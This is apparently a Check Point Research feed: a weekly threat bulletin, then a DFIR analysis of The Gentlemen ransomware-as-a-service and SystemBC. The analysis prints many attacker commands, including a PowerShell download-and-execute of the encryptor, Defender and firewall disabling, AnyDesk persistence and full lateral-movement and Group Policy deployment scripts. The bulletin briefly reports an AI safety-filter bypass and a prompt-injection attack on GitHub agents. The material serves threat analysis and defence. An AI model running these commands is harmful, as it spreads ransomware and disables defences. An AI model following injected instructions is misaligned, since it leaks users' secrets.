Normal view

Received — 23 April 2026 Check Point Research

20th April – Threat Intelligence Report

By: urias
20 April 2026 at 16:24

For the latest discoveries in cyber research for the week of 20th April, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Booking.com, the Amsterdam-based travel platform, has confirmed a data breach after unauthorized parties accessed reservation data linked to some customers. Exposed information included names, email addresses, phone numbers, physical addresses, and booking details, creating phishing risk, while the company reset reservation PINs and notified affected users.
  • McGraw-Hill, a global educational publisher, has disclosed a data breach following an extortion attempt after attackers accessed its Salesforce environment. Leaked data from about 13.5 million accounts includes names, email addresses, phone numbers, and physical addresses, while no payment card information was reported exposed.
  • EssentialPlugin, a WordPress plugins development firm, has suffered a supply chain compromise that pushed malicious updates to more than 30 plugins installed on thousands of websites. The backdoored code enabled unauthorized access and spam page creation, and WordPress.org closed the affected plugins while infections may remain.
  • Basic-Fit, Europe’s largest gym chain, has reported a data breach after attackers accessed a franchise-wide system used to track club visits. The incident exposed bank account details and personal data for about one million members across six countries, while passwords and identity documents were not affected.

AI THREATS

  • Researchers unveiled that a lone hacker weaponized Claude Code and OpenAI’s GPT-4.1 to breach nine Mexican government agencies. AI-driven commands accelerated reconnaissance, issuing 5,317 actions across 34 sessions and accessing 195 million taxpayer records and 220 million civil records, after safety filters were bypassed through prompt manipulation and an injected hacking manual.
  • Researchers detailed a phishing campaign that impersonates Anthropic’s Claude AI with a fake Claude Pro installer for Windows. The package displays a working application to distract victims while abusing a trusted program to sideload PlugX malware, enabling remote access and persistence on compromised systems.
  • Researchers demonstrated a prompt injection technique that hijacks AI agents used in GitHub workflows from major vendors. Malicious instructions hidden in pull request titles or comments can make the agents run commands and expose repository secrets, including access tokens and API keys, during automated development tasks.

VULNERABILITIES AND PATCHES

  • CISA warns of active exploitation of Apache ActiveMQ vulnerability CVE-2026-34197, a high-severity code injection flaw that allows remote code execution. The vulnerability carries a CVSS score of 8.8 and has been addressed by Apache in versions 5.19.4 or 6.2.3.

Check Point IPS provides protection against this threat (Apache ActiveMQ Code Injection (CVE-2026-34197))

  • Splunk has released fixes for CVE-2026-20204, a high-severity vulnerability in Splunk Enterprise and Cloud Platform. The flaw can let a low-privileged user upload a malicious file to a temporary directory and achieve remote code execution, while two additional medium-severity issues were also addressed.
  • As part of its Patch Tuesday, Microsoft has patched CVE-2026-33825, one of three actively-exploited Microsoft Defender zero-days dubbed BlueHammer, RedSun, and UnDefend that were revealed by a security researcher. The vulnerabilities allow local privilege escalation as well as denial of service, and researchers said exploitation began in April after the vulnerabilities were revealed.
  • CISA has flagged the vulnerability CVE-2025-60710, a Windows Task Host privilege escalation flaw affecting Windows 11 and Windows Server 2025, as being actively exploited in attacks. The vulnerability allows a local attacker to gain SYSTEM privileges on a compromised device.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have documented 2026 Q1 brand impersonation phishing focused on Microsoft, Apple, Google, and Amazon, which accounted for nearly half of observed attempts. The research shows attackers using lookalike subdomains, QR-based WhatsApp lures, and fake Adobe installers to steal credentials and compromise devices.
  • Researchers uncovered ZionSiphon, malware designed to target industrial control environments at water treatment and desalination facilities in Israel. The report says the code is configured for operational technology systems and reflects continued attacker interest in critical infrastructure, especially utilities with exposed or weakly defended networks.
  • Researchers identified more than 1,250 active command and control servers distributed across 165 Russian hosting providers between January and April 2026. The infrastructure supported malware campaigns involving traffic redirection systems, IoT botnets including Hajime, Mozi, and Mirai, and repurposed tools such as Cobalt Strike.
  • Researchers observed a fake “Ledger Live” app on Apple’s App Store that stole more than $9.5 million from over 50 cryptocurrency users within a week. The app harvested wallet credentials, drained funds across Bitcoin, Ethereum, Solana, Tron and XRP, and routed proceeds through KuCoin deposit addresses and the AudiA6 mixer, complicating recovery.

The post 20th April – Threat Intelligence Report appeared first on Check Point Research.

DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy

Key Points

  • The Gentlemen ransomware‑as‑a‑service (RaaS) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks (240) occurring in the first months of 2026.
  • The service provides a broad locker portfolio implemented in Go for WindowsLinuxNAS, and BSD, plus an additional locker written in C for ESXi, enabling coverage of the multiple platforms commonly found in corporate environments.
  • During an incident response engagement, an affiliate associated with The Gentlemen attempted to deploy SystemBC, a proxy malware frequently leveraged in human‑operated ransomware operations for covert tunneling and payload delivery.
  • Check Point Research observed victim telemetry from the relevant SystemBC command‑and‑control server, revealing a botnet of over 1,570 victims, with the infection profile strongly suggesting a focus on corporate and organizational environments rather than opportunistic consumer targeting.


The Gentlemen RaaS

The Gentlemen ransomware‑as‑a‑service (RaaS) operation is a relatively new group that emerged around mid‑2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates.

Figure 1 — The Gentlemen post on underground forums.

The RaaS provides affiliates with multi‑OS lockers for Windows, Linux, NAS, BSD implemented in Go, and an additional locker for ESXi implemented in C. The group also grants verified partners access to EDR‑killing tools and its own multi‑chain pivot infrastructure (server and client components).

The group maintains an onion site where it publishes data stolen from victims who refuse to pay. Negotiations, however, are not conducted through this leak portal but via the individual affiliate’s Tox ID. Tox is a free, decentralized, peer‑to‑peer (P2P) instant messaging protocol that provides end‑to‑end encrypted voice, video, and text communication.

The group also appears to maintain a Twitter/X account, which is referenced in the ransomware note. Through this account, the operators publicly post about victims, likely to increase pressure on them to pay.

Figure 2 — The Gentlemen RaaS X/Twitter account.

To date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. This growth in activity suggests that The Gentlemen RaaS program has managed to attract a significant number of affiliates over the last few months.


SystemBC Infections

During an incident response case, an affiliate of The Gentlemen Ransomware‑as‑a‑Service (RaaS) deployed SystemBC, a proxy malware, on the compromised host. SystemBC establishes SOCKS5 network tunnels within the victim’s environment and connects to its C&C server using a custom RC4‑encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or injected directly into memory.

The specific Command and Control server that was used for the communication had infected a large number of victims across the globe. It is likely that the majority of those victims are companies and organizations, given that SystemBC is typically deployed as part of human‑operated intrusion workflows rather than massive targeting.

Figure 3 — SystemBC global accesses.

There are over 1,570 victims, with the majority located in the United States, followed by the United Kingdom and Germany.

Figure 4 — Top 15 Infected countries.

Whether SystemBC is directly integrated into The Gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access remains unclear. At this time, Check Point Research has no evidence to determine the exact nature of this relationship.

Figure 5 — SystemBC infections panel.


DFIR Report – Timeline

Figure 6 – A high-level timeline of the attack

Initial Access and Establishment of Domain Control

The precise initial access vector could not be conclusively determined. The earliest stage of adversary activity that can be established with confidence is the attacker’s presence on a Domain Controller with Domain Admin–level privileges. From that position, the attacker appears to have performed systematic credential validation and host accessibility testing across the environment, as reflected in an initial pattern of failed network logons followed by successful authentications originating from the Domain Controller. This sequence is consistent with a controlled effort to verify privileged access and identify viable systems before expanding operations more broadly.

Remote Execution and Early Discovery

Using this privileged position, the attacker deployed Cobalt Strike payloads to remote systems by writing executables to administrative shares such as \\\\[REDACTED_HOSTNAME]\\ADMIN$\\<random_7_char>.exe and executing them via RPC. The first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. Early post-compromise actions included reconnaissance commands such as cmd.exe /C systeminfo, cmd.exe /C whoami, and enumeration commands like cmd.exe /C dir c:\\users. The attacker also accessed internal documentation via cmd.exe /C type \\\\[REDACTED_HOSTNAME]\\d$\\...\\公司主機紀錄.txt, indicating use of environment-specific knowledge in addition to automated discovery. Expansion to other systems followed quickly, with repeated execution artifacts such as regsvr32.exe across multiple hosts confirming centrally driven activity.

Command-and-Control and Payload Staging

As execution expanded, the attacker attempted to establish additional command-and-control capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /C tasklist | findstr /i socks. This tool is commonly used to create SOCKS-based proxy channels for covert communication and internal pivoting. In this instance, however, the activity was blocked by endpoint protection. Shortly thereafter, a remotely executed payload (<random_7_char>.exe) spawned c:\\windows\\system32\\rundll32.exe, which established outbound communication to 91.107.247[.]163 Cobalt Strike C&C over ports 443 and later 80, indicating successful external command-and-control connectivity through alternative infrastructure.

At the same stage, PowerShell was executed from a scheduled task context using:

powershell.exe -ExecutionPolicy Bypass -command (new-object net.webclient).downloadfile('http://[REDACTED_DOMAIN_CONTROLLER]:8080/grand.exe', 'c:\\programdata\\r.exe'); c:\\programdata\\r.exe --password VvO8EtUh --spread [REDACTED_DOMAIN]\\[REDACTED_USER]:[REDACTED_PASSWORD]

This command downloaded grand.exe (the ransomware encryptor) from an internal staging server (DC) and executed it as c:\\programdata\\r.exe. The arguments --password VvO8EtUh and --spread [REDACTED_DOMAIN]\\[REDACTED_USER]:[REDACTED_PASSWORD] indicate both controlled execution and built-in propagation capability, marking a transition from initial access to coordinated malware deployment.

Defense Evasion, Propagation, and Persistence

Following execution of the staged payload, the attacker attempted to weaken host defenses using:

powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force

This disabled Windows Defender real-time monitoring. The same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c:\\programdata\\r.exe, c:\\programdata\\g.exe, and c:\\programdata\\o.exe. This demonstrates rapid internal propagation via a shared malware component, supported by both domain-level access and the built-in spreading mechanism described earlier.

In parallel, the attacker performed environmental checks using commands such as:

cmd.exe /C wmic product where Name like '%kaspe%' get Name, IdentifyingNumber

Later, repeatedly executed across multiple hosts:

cmd.exe /C gpupdate /force

These attempts suggest the threat actor tried to influence or validate policy state during propagation. Remote Desktop was then enabled through commands such as:

cmd.exe /C reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Later, the attacker installed and configured AnyDesk using:

cmd.exe /C anydesk.exe --install C:\\Program Files (x86)\\AnyDesk\\anydesk.exe --start-with-win
cmd.exe /C echo Camry@12345 | C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe --set-password
cmd.exe /C anydesk.exe --start
cmd.exe /C anydesk.exe --get-id

This established a persistent remote access channel with a predefined password (Camry@12345), adding a secondary access mechanism after the SystemBC attempt was blocked.

Credential Access and Continued Discovery

Compromised hosts were also used for credential harvesting. Mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain accounts and stored credentials from Credential Manager. This confirms that credential access occurred alongside lateral movement and malware deployment.

At the same time, the attacker continued discovery operations using commands such as:

cmd.exe /C query session
cmd.exe /C nltest /domain_trusts
cmd.exe /C nltest /dclist
cmd.exe /C net group "Domain Admins" /domain
cmd.exe /C net group "Enterprise Admins" /domain

These commands indicate enumeration of active sessions, domain trust relationships, domain controllers, and privileged groups, reflecting a shift toward understanding and potentially controlling the broader domain structure.

Consolidated View of the Intrusion

Taken together, the attack progressed from suspected perimeter access to domain-level control, followed by credential validation, remote payload execution via ADMIN$ shares, and rapid expansion across endpoints. This was accompanied by attempted and successful command-and-control establishment using infrastructure such as 45.86.230[.]112 and 91.107.247[.]163, staged malware delivery from the internal DC, and widespread propagation of a shared payload under multiple filenames. Defensive measures were actively suppressed, and multiple persistence and exfiltration mechanisms were introduced, including RDP and AnyDesk.

The failed deployment of SystemBC and the subsequent reliance on alternative channels demonstrate that the attacker adapted their approach when blocked. Overall, the activity reflects coordinated, centrally controlled execution with layered access mechanisms, resulting in broad, durable control over the environment.

Impact

The intrusion culminated in the deployment of The Gentlemen RaaS payload by an affiliate, using Group Policy as the distribution mechanism. A GPO‑based deployment was configured so that the ransomware binary was executed on domain‑joined systems during policy refresh, resulting in a rapid, near‑simultaneous encryption event across the environment.


The Gentlemen GO Ransomware

The Gentlemen ransomware is developed in the Go programming language. It appears to be under active development, with new features and capabilities being continuously added over time.

Command Line Arguments

The Gentlemen ransomware exposes a wide range of command‑line options that provide numerous features to its operators. While most flags are optional, the only mandatory argument required to start the encryption process is --password, which appears to be unique per build/infection.

Usage: %s --password PASS [--path DIR1,DIR2,...] [--T MIN] [--silent] [--wipe] [--keep] [--full/system/shares] [--gpo/spread] [--fast/superfast/ultrafast] 

  Main Flags 
  --password PASS    Access password (required)
  --path DIRS        Comma-separated list of target directories/disks (optional)
  --T MIN            Delay before start, in minutes (optional)

  Mode Flags (cant be mixed) 
  --system           Run as SYSTEM: encrypt only local drives (optional)
  --shares           Encrypt only mapped network drives and available UNC shares in session context (optional)
  --full             Two-phase: --system + --shares. Best practice. (optional)

  Additional Flags 
  --spread CREDS     Lateral movement: "domain/user:pass" with creds, or "" for current session
  --gpo              Deploy via Group Policy to all domain computers (run on DC)
  --silent           Silent mode: do NOT rename and modify time of files after encryption, no wallpaper(optional)
  --keep             Do not selfdelete after encryption (optional)
  --wipe             Wipe free space after encryption (optional)

  Speed Flags (cant be mixed) 
  --fast             9 percent crypt. (optional)
  --superfast        3 percent crypt. (optional)
  --ultrafast        1 percent crypt. (optional)

    Example 1: --password QWERTY --path "C:\\,D:\\,\\\\nas\\share" --T 15 --silent
    Example 2: --password QWERTY --system --fast
    Example 3: --password QWERTY --shares --T 10
    Example 4: --password QWERTY --full --ultrafast
    Example 5: --password QWERTY --full --spread "domain\\admin:P@ss"  # With credentials
    Example 6: --password QWERTY --T 10 --keep --spread ""                     # Current session
    Example 7: --password QWERTY --gpo --full --fast

[+]

The minimum required command‑line for The Gentlemen ransomware execution is:

$process_name --password $pass

The password is plaintext hardcoded in the binary validates it with the password provided in the required argument.

Figure 7 — Argument – Hardcoded Password comparison.

Processes & Services Termination

To terminate running processes, the malware repeatedly executes the following command in a loop for each targeted process:

  • taskkill /IM <process>.exe /F
CategoryProcesses targeted
VMware / Hyper-Vvmms, vmwp, vmcompute, vmacthlp, vmtoolsd, vmware, vmware-tray, vmware-vmx, vmwareuser
SQL Serversqlservr, sql, sqlbrowser, sqlwriter, SQLAGENT, sqlceip, sqbcoreservice, fdlauncher, fdhost, isqlplussvc, ReportingServicesService, Microsoft.SqlServer.Management, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost, DBeaver, Ssms, dbeng50, dbsnmp
MySQL / PostgreSQL / Oraclemysqld, oracle, postmaster, postgres, psql, pgAdmin3, pgAdmin4, ocssd, ocomm, ocautoupds
Backup & RecoveryDatto, cbService, cbVSCService11, cbInterface, MSP360, Macrium, Acronis, Carbonite, CrashPlan, Unitrends, StorageCraft, raw_agent_svc, vsnapvss, ShadowProtectSvc, Iperius, IperiusService, avagent, avscc, CagService
VeeamVeeamNFSSvc, VeeamTransportSvc, VeeamDeploymentSvc, Veeam.EndPoint.Service
CommvaultCVMountd, cvd, cvfwd, CVODS
SAPSAP, saphostexec, saposco, sapstartsrv, agntsvc
Veritas / Symantec BEbedbh, vxmon, benetns, bengien, pvlsvr, beserver
Office / Productivityexcel, infopath, msaccess, mspub, onenote, outlook, powerpnt, visio, winword, wordpad, notepad
Email Clientsthebat, thunderbird, tbirdconfig
Web / App Serversw3wp, encsvc, xfssvccon
Remote AccessTeamViewer_Service, TeamViewer, tv_w32, tv_x64
QuickBooksQBIDPService, QBDBMgrN, QBCFMonitorService
Desktop / Misc Servicesmydesktopqos, mydesktopservice, mvdesktopservice, synctime, EnterpriseClient, DellSystemDetect, Docker Desktop
Otherfirefox, steam

For service termination, the ransomware relies on two distinct commands:

  1. sc config <service> start=disabled, sends a stop signal to the service right now, killing it immediately if it’s currently running.
  2. sc stop <service>, sends a stop signal to the service right now, killing it immediately if it’s currently running.
CategoryServices targeted
Backup & Recoveryvmms, veeam, backup, vss, YooBackup, DattoBackup, MSP360Service, Macrium*, ShadowProtectSvc, PDVFSService, AcronisCyberProtect, AcronisAgent, AcrSch2Svc, VSNAPVSS, storflt, stc_raw_agent, VeeamNFSSvc, VeeamDeploymentService, VeeamTransportSvc
Veritas / Backup ExecBackupExec*, BackupExecVSSProvider, BackupExecAgentAccelerator, BackupExecAgentBrowser, BackupExecDiveciMediaService, BackupExecJobEngine, BackupExecManagementService, BackupExecRPCService
SQL / DatabasesSql, sql, MSSQL*, MSSQLSERVER, MSSQL, MSSQL$SQLEXPRESS, SQLSERVERAGENT, SQLWriter, SQLAgent$SQLEXPRESS, MsDtsServer150, SSISScaleOutWorker150, SSSScaleOutMaster, SSSScaleOutWorker, SSASTELEMETRY, SQL Server Distributed Replay Client, SQL Server Distributed Replay Controller, MySQL, MariaDB, postgresql, OracleServiceORCL, (.)sql(.)
VMwareVMware, VMwareTools, VMwareHostd, VMAuthdService, VMUSBArbService
Exchange / SharePointmsexchange, MSExchange, MSExchange\$, WSBExchange, SPAdminV4
Security / AVSymantec*, sophos, DefWatch, RTVscan, SavRoam, ccSetMgr, ccEvtMgr, MVarmor, MVarmor64, zhudongfangyu
Commvault (Gx)*GxBlr, GxVss, GxClMgrS, GxCVD, GxClMgr, GXMMM, GxVsshWProv, GxFWD
SAPSAP, SAP$, SAPD$, SAPService, SAPHostControl, SAPHostExec
VeritasVeritas*
QuickBooksQBCFMonitorService, QBDBMgrN, QBIDPService
Other / Miscmepocs, memtas, docker, CAARCUpdateSvc, CASAD2DWebSvc, YooIT, svc$

Persistence

During execution, the ransomware attempts to establish persistence using multiple mechanisms. It first attempts to create a scheduled task, initially without validating the current process privileges:

  • schtasks /Delete /TN UpdateSystem /F
  • schtasks /Create /SC ONSTART /TN UpdateSystem /TR "<exe> <args>" /RU SYSTEM

In a second attempt, the ransomware creates the same scheduled task in the user context by reissuing the commands without the /RU SYSTEM.

  • schtasks /Delete /TN UpdateUser /F
  • schtasks /Create /SC ONSTART /TN UpdateUser /TR "<exe> <args>"

The second local persistence method relies on a Run registry key. As with scheduled tasks, the malware attempts to configure this both for the system (HKLM) and for the current user (HKCU):

  • reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v GupdateU /t REG_SZ /d "<exe>" /f

When the --spread argument is enabled, the ransomware also attempts to maintain remote persistence on each reachable host. For each target, it sets up two persistence mechanisms:

  • Scheduled tasks–based persistence
  • Service–based persistence

Both mechanisms attempt to execute the ransomware from different locations on the remote machine or over a share.

# Scheduled Tasks
schtasks /Create /S <target> /TN DefS /TR "<exe>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN DefS

schtasks /Create /S <target> /TN UpdateGS /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN UpdateGS

schtasks /Create /S <target> /TN UpdateGS2 /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
schtasks /Run /S <target> /TN UpdateGS2

# Services
sc \\\\<target> create DefSvc binpath= "<exe>"
sc \\\\<target> start DefSvc

sc \\\\<target> create UpdateSvc binpath= "\\\\<host>\\share$\\<exe> <creds>"
sc \\\\<target> start UpdateSvc

sc \\\\<target> create UpdateSvc2 binpath= "C:\\Temp\\<exe> <creds>"
sc \\\\<target> start UpdateSvc2

*Full command lines for the --spread argument are provided further below.

Antivirus Evasion

The ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire C:\\ drive from scanning and monitoring:

  • powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force, disables Defender’s real-time protection entirely, the background scanning that monitors files, downloads, and processes as they’re accessed. With this off, malware can run without being intercepted.
  • powershell -Command Add-MpPreference -ExclusionProcess <ransomware_exe> -Force, adds a specific executable to Defender’s process exclusion list. Defender will completely ignore any file activity triggered by that process, even if it’s doing something malicious.
  • powershell -Command Add-MpPreference -ExclusionPath C:\\ -Force, adds the entire C: drive to Defender’s path exclusion list. This tells Defender to skip scanning anything on the drive, every file, folder, and executable.

During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down the firewall, re-enables SMB1, and loosens LSA anonymous access controls, all before deploying and executing the ransomware binary on that host.

Set-MpPreference -DisableRealtimeMonitoring $true
Add-MpPreference -ExclusionPath 'C:\\'
Add-MpPreference -ExclusionPath 'C:\\Temp'
Add-MpPreference -ExclusionPath '\\\\<host>\\share$'
Add-MpPreference -ExclusionProcess '<exe>'
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
reg add ...\\Lsa /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
reg add ...\\Lsa /v RestrictAnonymous /t REG_DWORD /d 0 /f

Windows Firewall

The ransomware tries to disable the firewall to allow unrestricted outbound and inbound traffic. This enables lateral movement tools (PsExec, WMI, SMB) to reach remote hosts without firewall rules blocking them, and allows exfiltration channels to operate freely. Bellow the executed commands deactivating the firewall:

  • netsh advfirewall set allprofiles state off
  • powershell -Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
  • sc stop mpssvc
  • sc config mpssvc start=disabled

Lateral movement, --spread argument

The --spread argument is disabled by default and is assigned the value "DISABLED". The lateral movement phase is only activated when the operator explicitly supplies --spread "domain\\user:password", providing credentials harvested from the environment.

These credentials are then reused across all lateral movement operations: PsExec receives them via the -u and -p parameters, WMI uses them for remote authentication, and remote scheduled task and service creation, authenticating with them against each target host.

Once --spread is enabled, the ransomware enumerates all domain computers via Active Directory, pings each discovered host to confirm reachability, and, for every host that responds, executes the full lateral movement sequence: copying the binary, pushing the Defender‑disabling script, and deploying it through six parallel execution channels across PsExec, WMI, scheduled tasks, and services.

 --- SETUP (executed once before the per-target loop) ---

 cmd /C copy "<exe>" "C:\\Temp\\" /Y
 cmd /C xcopy "<exe>" "\\\\<host>\\C$\\Temp\\" /Y /I /C /H /R /K
 cmd /C net share share$=C:\\Temp /GRANT:Everyone,FULL
 cmd /C icacls C:\\Temp /grant "ANONYMOUS LOGON":F
 cmd /C reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
        /v NullSessionShares /t REG_MULTI_SZ /d share$ /f
 cmd /C reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
        /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f

 --- PER TARGET (loop over all reachable hosts) ---

 -- File copy to target --
 cmd /C copy "<exe>" "C:\\Temp\\" /Y
 cmd /C xcopy "<exe>" "\\\\<target>\\C$\\Temp\\" /Y /I /C /H /R /K

 -- PsExec: disable Defender on target (with credentials) --
 psexec \\\\<target> -accepteula -d -s -u <domain\\user> -p <pass>
     cmd /c <DEFENDER_SCRIPT_A>

 -- PsExec: disable Defender on target (no credentials) --
 psexec \\\\<target> -accepteula -d -s
     cmd /c <DEFENDER_SCRIPT_A>

 -- PsExec: run via local Temp (with credentials) --
 psexec \\\\<target> -accepteula -d -h -u <domain\\user> -p <pass>
     C:\\Temp\\<exe> <creds>

 -- PsExec: run via local Temp (no credentials) --
 psexec \\\\<target> -accepteula -d -h
     C:\\Temp\\<exe>

 -- WMI: run Defender disable script --
 wmic /node:<target> process call create "<DEFENDER_SCRIPT_A>"

 -- WMI: run via share path --
 wmic /node:<target> process call create
    "\\\\<host>\\share$\\<exe> <creds>"

 -- WMI: run via local Temp --
 wmic /node:<target> process call create
    "C:\\Temp\\<exe> <creds>"

 -- Remote schtask: DefU (no SYSTEM) --
 schtasks /Create /S <target> /TN DefU
      /TR "<exe>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN DefU

 -- Remote schtask: UpdateGU (share path) --
 schtasks /Create /S <target> /TN UpdateGU
      /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN UpdateGU

 -- Remote schtask: UpdateGU2 (local Temp) --
 schtasks /Create /S <target> /TN UpdateGU2
      /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM>
 schtasks /Run   /S <target> /TN UpdateGU2

 -- Remote schtask: DefS (SYSTEM, direct exe) --
 schtasks /Create /S <target> /TN DefS
      /TR "<exe>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN DefS

 -- Remote schtask: UpdateGS (SYSTEM, share path) --
 schtasks /Create /S <target> /TN UpdateGS
      /TR "\\\\<host>\\share$\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN UpdateGS

 -- Remote schtask: UpdateGS2 (SYSTEM, local Temp) --
 schtasks /Create /S <target> /TN UpdateGS2
      /TR "C:\\Temp\\<exe> <creds>" /SC ONCE /ST <HH:MM> /RU SYSTEM
 schtasks /Run   /S <target> /TN UpdateGS2

 -- Remote service: DefSvc (direct exe) --
 sc \\\\<target> create DefSvc  binpath= "<exe>"
 sc \\\\<target> start  DefSvc

 -- Remote service: UpdateSvc (share path) --
 sc \\\\<target> create UpdateSvc  binpath= "\\\\<host>\\share$\\<exe> <creds>"
 sc \\\\<target> start  UpdateSvc

 -- Remote service: UpdateSvc2 (local Temp) --
 sc \\\\<target> create UpdateSvc2 binpath= "C:\\Temp\\<exe> <creds>"
 sc \\\\<target> start  UpdateSvc2

 -- Remote PowerShell: SCRIPT_B — full Defender/firewall/SMB1/LSA/shares (no creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Set-MpPreference -DisableRealtimeMonitoring $true;
    Add-MpPreference -ExclusionPath 'C:\\';
    Add-MpPreference -ExclusionPath 'C:\\Temp';
    Add-MpPreference -ExclusionPath '\\\\<host>\\share$';
    Add-MpPreference -ExclusionProcess '<exe>';
    Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
    Get-PSDrive -PSProvider FileSystem |
     Where-Object {$_.Name -match '^[A-Z]$'} |
     ForEach-Object {
      $d = $_.Name;
      net share ($d+'$')=($d+':\\') /GRANT:Everyone,FULL 2>$null;
      icacls ($d+':\\') /grant Everyone:F /T /C /Q 2>$null
     };
    Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart 2>$null;
    reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
      /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f 2>$null;
    reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
      /v RestrictAnonymous /t REG_DWORD /d 0 /f 2>$null"

 -- Remote PowerShell: SCRIPT_C — WinRM Defender disable + process exclusion (with creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Set-MpPreference -DisableRealtimeMonitoring $true;
      Add-MpPreference -ExclusionPath 'C:\\';
      Add-MpPreference -ExclusionProcess '<exe>'
    }"

 -- Remote PowerShell: SCRIPT_D — WinRM start process via share (no creds, 67-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock { Start-Process '<exe>' }"

 -- Remote PowerShell: SCRIPT_E — WinRM start process via share with args (with creds, 96-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Start-Process -FilePath '<\\\\<host>\\share$\\<exe>>' -ArgumentList '<creds>'
    }"

 -- Remote PowerShell: SCRIPT_F — WinRM start process via local Temp (no creds, 63-char template) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock { Start-Process 'C:\\Temp\\<exe>' }"

 -- Remote PowerShell: SCRIPT_G — WinRM start process via local Temp with args (with creds) --
 powershell -NoProfile -ExecutionPolicy Bypass -Command
   "Invoke-Command -ComputerName <target> -ScriptBlock {
      Start-Process -FilePath 'C:\\Temp\\<exe>' -ArgumentList '<creds>'
    }"
    

 SCRIPT_A (Defender disable — used inline by PsExec and WMI calls)
 ---------------------------------------------------------------
 powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true;
   Add-MpPreference -ExclusionPath 'C:\\';
   Add-MpPreference -ExclusionPath 'C:\\Temp';
   Add-MpPreference -ExclusionPath '\\\\<host>\\share$';
   Add-MpPreference -ExclusionProcess '<exe>';
   Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
   Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart 2>$null;
   reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
     /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f 2>$null;
   reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa'
     /v RestrictAnonymous /t REG_DWORD /d 0 /f 2>$null"

Deploy via Group Policy

The --gpo flag enables the most powerful and far-reaching deployment method in the entire binary, reserved specifically for operators who have already compromised a Domain Controller. It is designed to weaponize Active Directory’s own Group Policy infrastructure to detonate the ransomware simultaneously on every computer in the domain. When --gpo is enabled, the following PowerShell script is executed:

  Write-Host "[+] Installing required modules..."
  try { Import-Module ServerManager -ErrorAction Stop } catch {}
  try { Add-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
  try { Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
  try { Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
        -ErrorAction SilentlyContinue } catch {}
  try { Add-WindowsCapability -Online -Name "Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0"
        -ErrorAction SilentlyContinue } catch {}
  try { DISM.exe /Online /Add-Capability
        /CapabilityName:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 2>$null } catch {}
  try { DISM.exe /Online /Add-Capability
        /CapabilityName:Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 2>$null } catch {}
